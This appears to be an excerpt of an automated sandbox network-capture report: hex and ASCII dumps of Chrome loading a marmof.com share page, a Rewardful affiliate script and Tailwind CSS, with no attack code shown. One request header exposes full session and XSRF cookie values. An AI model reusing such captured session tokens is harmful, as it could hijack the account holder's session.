                                                                                                                                              Data Ascii: .1583 109.242 16.78 101.4 16.78H74.46V3.56001C74.46 2.20194 73.3581 1.10001 72 1.10001ZM101.4 21.7C106.529 21.7 110.7 25.8743 110.7 31V58.44C110.7 63.5658 106.529 67.74 101.4 67.74H42.6C37.4706 67.74 33.3 63.5658 33.3 58.44V31C33.3 25.8743 37.4706 21.7 42
                                                                                                                                              2024-11-06 15:55:22 UTC16384INData Raw: 65 20 77 61 79 20 74 6f 20 77 72 69 74 65 20 74 68 65 20 74 65 78 74 20 74 68 61 74 20 73 65 6c 6c 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 64 65 73 63 72 69 70 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 54 68 69 73 20 74 6f 6f 6c 20 69 73 20 61 6e 20 65 66 66 65 63 74 69 76 65 20 77 61 79 20 74 6f 20 77 72 69 74 65 20 74 65 78 74 20 74 68 61 74 20 73 65 6c 6c 73 2e 20 49 74 20 70 72 6f 76 69 64 65 73 20 61 20 73 74 65 70 2d 62 79 2d 73 74 65 70 20 67 75 69 64 65 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 63 72 65 61 74 65 20 70 65 72 73 75 61 73 69 76 65 2c 20 63 6f 6d 70 65 6c 6c 69 6e 67 2c 20 61 6e 64 20 69 6e 74 65 72 65 73 74 69 6e 67 20 73 61 6c 65 73 20 74 65 78 74 2e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 67 65 6e 65 72 61 74 69 6f 6e 5f 72
                                                                                                                                              Data Ascii: e way to write the text that sells&quot;,&quot;description&quot;:&quot;This tool is an effective way to write text that sells. It provides a step-by-step guide to help you create persuasive, compelling, and interesting sales text.&quot;,&quot;generation_r
                                                                                                                                              2024-11-06 15:55:22 UTC16384INData Raw: 3b 68 6f 72 69 7a 6f 6e 2f 61 70 69 2f 6d 6f 6e 69 74 6f 72 69 6e 67 2f 7b 74 61 67 7d 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6d 65 74 68 6f 64 73 26 71 75 6f 74 3b 3a 5b 26 71 75 6f 74 3b 47 45 54 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 48 45 41 44 26 71 75 6f 74 3b 5d 2c 26 71 75 6f 74 3b 70 61 72 61 6d 65 74 65 72 73 26 71 75 6f 74 3b 3a 5b 26 71 75 6f 74 3b 74 61 67 26 71 75 6f 74 3b 5d 7d 2c 26 71 75 6f 74 3b 68 6f 72 69 7a 6f 6e 2e 6d 6f 6e 69 74 6f 72 69 6e 67 2d 74 61 67 2e 64 65 73 74 72 6f 79 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 75 72 69 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 6f 72 69 7a 6f 6e 2f 61 70 69 2f 6d 6f 6e 69 74 6f 72 69 6e 67 2f 7b 74 61 67 7d 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6d 65 74 68 6f 64 73 26 71 75 6f 74 3b 3a 5b
                                                                                                                                              Data Ascii: ;horizon/api/monitoring/{tag}&quot;,&quot;methods&quot;:[&quot;GET&quot;,&quot;HEAD&quot;],&quot;parameters&quot;:[&quot;tag&quot;]},&quot;horizon.monitoring-tag.destroy&quot;:{&quot;uri&quot;:&quot;horizon/api/monitoring/{tag}&quot;,&quot;methods&quot;:[
                                                                                                                                              2024-11-06 15:55:22 UTC16384INData Raw: 3a 26 71 75 6f 74 3b 61 70 70 2e 6d 61 72 6d 6f 66 2e 63 6f 6d 26 71 75 6f 74 3b 7d 2c 26 71 75 6f 74 3b 64 61 74 61 2d 68 75 62 2e 69 6e 64 65 78 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 75 72 69 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 64 61 74 61 2d 68 75 62 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6d 65 74 68 6f 64 73 26 71 75 6f 74 3b 3a 5b 26 71 75 6f 74 3b 47 45 54 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 48 45 41 44 26 71 75 6f 74 3b 5d 2c 26 71 75 6f 74 3b 64 6f 6d 61 69 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 61 70 70 2e 6d 61 72 6d 6f 66 2e 63 6f 6d 26 71 75 6f 74 3b 7d 2c 26 71 75 6f 74 3b 64 61 74 61 2d 68 75 62 2e 73 74 6f 72 65 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 75 72 69 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 64 61 74 61 2d 68 75 62 2f
                                                                                                                                              Data Ascii: :&quot;app.marmof.com&quot;},&quot;data-hub.index&quot;:{&quot;uri&quot;:&quot;data-hub&quot;,&quot;methods&quot;:[&quot;GET&quot;,&quot;HEAD&quot;],&quot;domain&quot;:&quot;app.marmof.com&quot;},&quot;data-hub.store&quot;:{&quot;uri&quot;:&quot;data-hub/
                                                                                                                                              2024-11-06 15:55:22 UTC938INData Raw: 6f 73 65 2d 78 73 20 6d 78 2d 61 75 74 6f 20 6d 61 78 2d 77 2d 34 78 6c 20 73 70 61 63 65 2d 79 2d 35 20 70 78 2d 33 20 73 6d 3a 70 78 2d 31 30 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 32 30 32 34 2d 31 31 2d 30 36 20 55 6e 74 69 74 6c 65 64 20 44 6f 63 75 6d 65 6e 74 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 2d 78 6c 20 62 67 2d 67 72 61 79 2d 35 30 20 70 2d 32 20 74 65 78 74 2d 73 6d 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 72 2d 35 20 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20
                                                                                                                                              Data Ascii: ose-xs mx-auto max-w-4xl space-y-5 px-3 sm:px-10"><div class="text-center"><h1 class="font-semibold">2024-11-06 Untitled Document</h1></div><div class="flex items-center justify-center rounded-xl bg-gray-50 p-2 text-sm"><div class="mr-5 flex items-center


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              2192.168.2.184974018.66.147.864432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:23 UTC512OUTGET /rw.js HTTP/1.1
                                                                                                                                              Host: r.wdfl.co
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://app.marmof.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:23 UTC530INHTTP/1.1 200 OK
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 18631
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Tue, 05 Nov 2024 07:12:21 GMT
                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Server: AmazonS3
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:23 GMT
                                                                                                                                              Cache-Control: max-age=3600
                                                                                                                                              ETag: "05550215707fb77f6d07bcc793526e28"
                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                              Via: 1.1 da78abc509aafffb42eec33ca2dc60d4.cloudfront.net (CloudFront)
                                                                                                                                              X-Amz-Cf-Pop: FRA60-P4
                                                                                                                                              X-Amz-Cf-Id: Ki_yBWyOJjGNW_kaovhhoRwvaALg7ZAyxYM37Po0HAIN1nUNOEIS-g==
                                                                                                                                              Age: 850
                                                                                                                                              2024-11-06 15:55:23 UTC15854INData Raw: 2f 2a 21 20 42 75 69 6c 64 20 34 37 31 35 62 63 63 64 35 38 64 39 39 35 39 35 34 36 36 61 30 62 36 36 34 30 61 33 35 36 64 65 32 37 36 37 62 35 39 39 3a 31 37 33 30 37 33 34 38 33 38 34 35 30 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 72 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 2e 6d 3d 65 2c 72 2e 63 3d 74 2c 72 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29
                                                                                                                                              Data Ascii: /*! Build 4715bccd58d99595466a0b6640a356de2767b599:1730734838450 */!function(e){var t={};function r(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,r),o.l=!0,o.exports}r.m=e,r.c=t,r.d=function(e,t,n)
                                                                                                                                              2024-11-06 15:55:23 UTC2777INData Raw: 74 2c 22 70 72 6f 74 6f 74 79 70 65 22 2c 7b 77 72 69 74 61 62 6c 65 3a 21 31 7d 29 2c 65 7d 28 29 2c 42 3d 49 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 5f 72 65 77 61 72 64 66 75 6c 5f 6c 6f 61 64 65 64 29 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 52 65 77 61 72 64 66 75 6c 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 2e 22 29 3b 65 6c 73 65 7b 77 69 6e 64 6f 77 2e 5f 72 65 77 61 72 64 66 75 6c 5f 6c 6f 61 64 65 64 3d 21 30 3b 74 72 79 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 73 63 72 69 70 74 5b 64 61 74 61 2d 72 65 77 61 72 64 66 75 6c 5d 22 29 3b 69 66 28 65 29 7b 77 69 6e 64 6f 77 2e 52 65 77 61 72 64 66 75 6c 3d 4c 2c 4c 2e 73 65 74 75 70
                                                                                                                                              Data Ascii: t,"prototype",{writable:!1}),e}(),B=I;!function(){if(window&&window._rewardful_loaded)console.warn("Rewardful is already loaded.");else{window._rewardful_loaded=!0;try{var e=document.querySelector("script[data-rewardful]");if(e){window.Rewardful=L,L.setup


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              3192.168.2.1849747159.69.48.314432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:23 UTC1310OUTGET /build/assets/app-0b1f8530.css HTTP/1.1
                                                                                                                                              Host: app.marmof.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6InZaRzZrNXZUQWpvRThHdStNbldvVHc9PSIsInZhbHVlIjoidXRzQ3FrdE85QnRmUGpwUmtZNUlWREIxNm5mM0liTStnTlFTWnRrUlRWMWc2eDZwcXJyUnBQdWVJOTVKMXFpeHFUMlZFRStqYmNTNWYzUE15SXZFVXBoeEo0c1I0RFc5d0U2cEUvdzVIbHNiQVF4SktoeERFbmZqZXp3Y0hxZ0EiLCJtYWMiOiI4NjY0N2JlYzE4NTNkMzkwZjRhOTIyZGUxMzRhNDkzNWE3OTA1NjZiMGE0NjMzYTM4MzE4NmJhY2MyYTQ4NzMwIiwidGFnIjoiIn0%3D; marmof_session=eyJpdiI6IkNoV3FFcHR3bkNtVnp3K2lpOTRLcVE9PSIsInZhbHVlIjoiZHpMRjZBTW9aamlYM3dHTkpBT011WFNiWHdVdVZibHR6YXg4TlBwNytLQlhaaHh5VGFld252NW9wajdsazBITjJ0K1IrWm9sMmZIb2lJRkFRNzQwa0FyVnFnQ0g1RUFwb1lkVStJaDJRTWRQUE9vUzNhZDZqa3p4ZWNLaXJwV0wiLCJtYWMiOiIyYTFkMTY5ZjhkMTIyYWM3Y2M4ZWMzMDA2ZmEwNjc5OTkxYTE5ZWUzNmFmMzMzN2NlOTM0NzRlMjg0ZWU1OWVlIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:23 UTC348INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:23 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 329656
                                                                                                                                              Last-Modified: Fri, 21 Jun 2024 14:30:40 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              ETag: "66758e90-507b8"
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              2024-11-06 15:55:23 UTC16036INData Raw: 2f 2a 21 20 74 61 69 6c 77 69 6e 64 63 73 73 20 76 33 2e 33 2e 35 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 68 74 74 70 73 3a 2f 2f 74 61 69 6c 77 69 6e 64 63 73 73 2e 63 6f 6d 2a 2f 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 23 65 35 65 37 65 62 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 2d 2d 74 77 2d 63 6f 6e 74 65 6e 74 3a 22 22 7d 68 74 6d 6c 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 66 6f 6e 74 2d 66 65 61 74 75 72 65 2d 73 65 74 74 69 6e 67 73 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 49 6e 74 65 72 2c 75 69 2d 73 61 6e 73 2d 73 65 72 69 66 2c 73 79
                                                                                                                                              Data Ascii: /*! tailwindcss v3.3.5 | MIT License | https://tailwindcss.com*/*,:after,:before{border:0 solid #e5e7eb;box-sizing:border-box}:after,:before{--tw-content:""}html{-webkit-text-size-adjust:100%;font-feature-settings:normal;font-family:Inter,ui-sans-serif,sy
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 68 32 20 63 6f 64 65 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 70 72 6f 73 65 20 3a 77 68 65 72 65 28 68 33 20 63 6f 64 65 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 65 6d 7d 2e 70 72 6f 73 65 20 3a
                                                                                                                                              Data Ascii: lass~=not-prose] *)){color:inherit}.prose :where(h2 code):not(:where([class~=not-prose],[class~=not-prose] *)){color:inherit;font-size:.875em}.prose :where(h3 code):not(:where([class~=not-prose],[class~=not-prose] *)){color:inherit;font-size:.9em}.prose :
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 70 72 6f 73 65 2d 62 61 73 65 20 3a 77 68 65 72 65 28 68 33 2b 2a 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 70 72 6f 73 65 2d 62 61 73 65 20 3a 77 68 65 72 65 28 68 34 2b 2a 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 70 72 6f 73 65 2d 62 61 73 65
                                                                                                                                              Data Ascii: :where([class~=not-prose],[class~=not-prose] *)){margin-top:0}.prose-base :where(h3+*):not(:where([class~=not-prose],[class~=not-prose] *)){margin-top:0}.prose-base :where(h4+*):not(:where([class~=not-prose],[class~=not-prose] *)){margin-top:0}.prose-base
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 3a 31 72 65 6d 7d 2e 6d 69 6e 2d 77 2d 5c 5b 74 68 65 6d 65 5c 28 73 70 61 63 69 6e 67 5c 2e 35 5c 29 5c 5d 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 2e 32 35 72 65 6d 7d 2e 6d 69 6e 2d 77 2d 5c 5b 74 68 65 6d 65 5c 28 73 70 61 63 69 6e 67 5c 2e 36 5c 29 5c 5d 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 2e 35 72 65 6d 7d 2e 6d 69 6e 2d 77 2d 5c 5b 74 68 65 6d 65 5c 28 73 70 61 63 69 6e 67 5c 2e 38 5c 29 5c 5d 7b 6d 69 6e 2d 77 69 64 74 68 3a 32 72 65 6d 7d 2e 6d 61 78 2d 77 2d 32 78 6c 7b 6d 61 78 2d 77 69 64 74 68 3a 34 32 72 65 6d 7d 2e 6d 61 78 2d 77 2d 35 78 6c 7b 6d 61 78 2d 77 69 64 74 68 3a 36 34 72 65 6d 7d 2e 6d 61 78 2d 77 2d 36 78 6c 7b 6d 61 78 2d 77 69 64 74 68 3a 37 32 72 65 6d 7d 2e 6d 61 78 2d 77 2d 5c 5b 31 34 72 65 6d 5c 5d 7b 6d 61 78 2d 77 69 64 74
                                                                                                                                              Data Ascii: :1rem}.min-w-\[theme\(spacing\.5\)\]{min-width:1.25rem}.min-w-\[theme\(spacing\.6\)\]{min-width:1.5rem}.min-w-\[theme\(spacing\.8\)\]{min-width:2rem}.max-w-2xl{max-width:42rem}.max-w-5xl{max-width:64rem}.max-w-6xl{max-width:72rem}.max-w-\[14rem\]{max-widt
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 20 36 38 2f 76 61 72 28 2d 2d 74 77 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 72 65 64 2d 36 30 30 7b 2d 2d 74 77 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 32 30 20 33 38 20 33 38 2f 76 61 72 28 2d 2d 74 77 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 72 65 64 2d 38 30 30 7b 2d 2d 74 77 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 28 31 35 33 20 32 37 20 32 37 2f 76 61 72 28 2d 2d 74 77 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 31 30 30 30 7b 2d 2d 74 77 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a
                                                                                                                                              Data Ascii: 68/var(--tw-border-opacity))}.border-red-600{--tw-border-opacity:1;border-color:rgb(220 38 38/var(--tw-border-opacity))}.border-red-800{--tw-border-opacity:1;border-color:rgb(153 27 27/var(--tw-border-opacity))}.border-secondary-1000{--tw-border-opacity:
                                                                                                                                              2024-11-06 15:55:23 UTC16384INData Raw: 33 35 2f 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 72 69 6e 67 2d 67 72 61 79 2d 33 30 30 7b 2d 2d 74 77 2d 72 69 6e 67 2d 6f 70 61 63 69 74 79 3a 31 3b 2d 2d 74 77 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 30 39 20 32 31 33 20 32 31 39 2f 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 72 69 6e 67 2d 67 72 61 79 2d 36 30 30 5c 2f 31 30 7b 2d 2d 74 77 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 37 35 2c 38 35 2c 39 39 2c 2e 31 29 7d 2e 72 69 6e 67 2d 67 72 61 79 2d 39 30 30 5c 2f 31 30 7b 2d 2d 74 77 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 31 37 2c 32 34 2c 33 39 2c 2e 31 29 7d 2e 72 69 6e 67 2d 67 72 61 79 2d 39 35 30 5c 2f 31 30 7b 2d 2d 74 77 2d 72 69 6e 67 2d 63 6f
                                                                                                                                              Data Ascii: 35/var(--tw-ring-opacity))}.ring-gray-300{--tw-ring-opacity:1;--tw-ring-color:rgb(209 213 219/var(--tw-ring-opacity))}.ring-gray-600\/10{--tw-ring-color:rgba(75,85,99,.1)}.ring-gray-900\/10{--tw-ring-color:rgba(17,24,39,.1)}.ring-gray-950\/10{--tw-ring-co
                                                                                                                                              2024-11-06 15:55:24 UTC16384INData Raw: 30 7d 2e 6c 67 5c 3a 70 72 6f 73 65 2d 6c 67 20 3a 77 68 65 72 65 28 74 62 6f 64 79 20 74 64 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 74 66 6f 6f 74 20 74 64 3a 6c 61 73 74 2d 63 68 69 6c 64 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 2e 6c 67 5c 3a 70 72 6f 73 65 2d 6c 67 20 3a 77 68 65 72 65 28 66 69 67 75 72 65 29 3a 6e 6f 74 28 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 2c 5b 63 6c 61 73 73 7e 3d 6e 6f 74 2d 70 72 6f 73 65 5d 20 2a 29 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 37 37 37 37 37 37 38 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 37
                                                                                                                                              Data Ascii: 0}.lg\:prose-lg :where(tbody td:last-child,tfoot td:last-child):not(:where([class~=not-prose],[class~=not-prose] *)){padding-right:0}.lg\:prose-lg :where(figure):not(:where([class~=not-prose],[class~=not-prose] *)){margin-bottom:1.7777778em;margin-top:1.7
                                                                                                                                              2024-11-06 15:55:24 UTC16384INData Raw: 72 28 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 66 6f 63 75 73 5c 3a 62 67 2d 69 6e 64 69 67 6f 2d 31 30 30 3a 66 6f 63 75 73 7b 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 32 34 20 32 33 31 20 32 35 35 2f 76 61 72 28 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 66 6f 63 75 73 5c 3a 62 67 2d 69 6e 64 69 67 6f 2d 36 30 30 3a 66 6f 63 75 73 7b 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 37 39 20 37 30 20 32 32 39 2f 76 61 72 28 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 66 6f 63 75 73 5c 3a 62 67 2d 70 72 69 6d 61 72 79 2d 31 30 30 3a 66 6f 63 75 73 7b 2d 2d 74 77 2d 62
                                                                                                                                              Data Ascii: r(--tw-bg-opacity))}.focus\:bg-indigo-100:focus{--tw-bg-opacity:1;background-color:rgb(224 231 255/var(--tw-bg-opacity))}.focus\:bg-indigo-600:focus{--tw-bg-opacity:1;background-color:rgb(79 70 229/var(--tw-bg-opacity))}.focus\:bg-primary-100:focus{--tw-b
                                                                                                                                              2024-11-06 15:55:24 UTC16384INData Raw: 65 2d 79 29 29 20 72 6f 74 61 74 65 28 76 61 72 28 2d 2d 74 77 2d 72 6f 74 61 74 65 29 29 20 73 6b 65 77 28 76 61 72 28 2d 2d 74 77 2d 73 6b 65 77 2d 78 29 29 20 73 6b 65 77 59 28 76 61 72 28 2d 2d 74 77 2d 73 6b 65 77 2d 79 29 29 20 73 63 61 6c 65 58 28 76 61 72 28 2d 2d 74 77 2d 73 63 61 6c 65 2d 78 29 29 20 73 63 61 6c 65 59 28 76 61 72 28 2d 2d 74 77 2d 73 63 61 6c 65 2d 79 29 29 7d 3a 69 73 28 5b 64 69 72 3d 72 74 6c 5d 20 2e 72 74 6c 5c 3a 2d 74 72 61 6e 73 6c 61 74 65 2d 78 2d 66 75 6c 6c 29 7b 2d 2d 74 77 2d 74 72 61 6e 73 6c 61 74 65 2d 78 3a 2d 31 30 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 76 61 72 28 2d 2d 74 77 2d 74 72 61 6e 73 6c 61 74 65 2d 78 29 2c 76 61 72 28 2d 2d 74 77 2d 74 72 61 6e 73 6c 61 74 65 2d 79 29
                                                                                                                                              Data Ascii: e-y)) rotate(var(--tw-rotate)) skew(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}:is([dir=rtl] .rtl\:-translate-x-full){--tw-translate-x:-100%;transform:translate(var(--tw-translate-x),var(--tw-translate-y)
